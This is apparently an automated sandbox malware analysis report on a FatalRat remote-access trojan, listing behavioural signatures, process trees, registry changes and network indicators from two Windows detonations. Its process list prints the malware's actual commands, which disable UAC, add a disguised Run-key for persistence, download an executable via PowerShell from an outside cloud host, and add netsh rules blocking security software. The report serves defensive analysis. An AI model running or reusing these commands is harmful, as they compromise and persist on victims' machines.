Malware Analysis Report

2025-03-15 03:49

Sample ID 250223-pw7v1axkcs
Target 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk
SHA256 b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Tags
fatalrat defense_evasion discovery execution infostealer persistence privilege_escalation rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.

Malicious Activity Summary

UAC bypass

Fatalrat family

FatalRat

Fatal Rat payload

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Drops desktop.ini file(s)

Adds Run key to start application

Checks installed software on the system

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-23 12:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-23 12:41

Reported

2025-02-23 12:44

Platform

win7-20240903-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024200\Agghosts.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024200\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024200\Agghosts.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024200\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2000 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2000 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2000 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2736 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2736 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2736 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2008 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2008 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2008 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2008 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2008 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2008 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2764 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024200\1.bat" "

C:\programdata\20250223024200\Agghosts.exe

"C:\programdata\20250223024200\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024200\fhq.bat" "

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
N/A 127.0.0.1:49245 tcp
US 8.8.8.8:53 www.baidu.com udp
CN 103.235.47.188:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.17.5.133:80 www.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabF124.tmp

C:\Users\Admin\AppData\Local\Temp\TarF3E5.tmp

memory/2736-36-0x0000000003DE0000-0x00000000041F4000-memory.dmp

memory/2736-38-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

memory/2736-37-0x0000000004200000-0x0000000004619000-memory.dmp

memory/2736-35-0x0000000004200000-0x0000000004619000-memory.dmp

memory/2736-39-0x0000000004200000-0x0000000004619000-memory.dmp

C:\Users\Public\Downloads\20250223024200\1.bat

C:\ProgramData\20250223024200\Agghosts.exe

C:\ProgramData\lnk\2.lnk

C:\programdata\20250223024200\libcef.dll

C:\Users\Public\Videos\download_and_run.bat

C:\programdata\20250223024200\Ensup.log

C:\Users\Public\Downloads\20250223024200\fhq.bat

memory/2384-96-0x0000000000160000-0x0000000000189000-memory.dmp

memory/2736-94-0x0000000003DE0000-0x00000000041F4000-memory.dmp

memory/2736-93-0x0000000004200000-0x0000000004619000-memory.dmp

memory/1688-107-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/1688-106-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-23 12:41

Reported

2025-02-23 12:44

Platform

win10v2004-20250217-en

Max time kernel

141s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024202\Agghosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Videos\bin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024202\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024202\Agghosts.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies registry class

Description Indicator Process Target
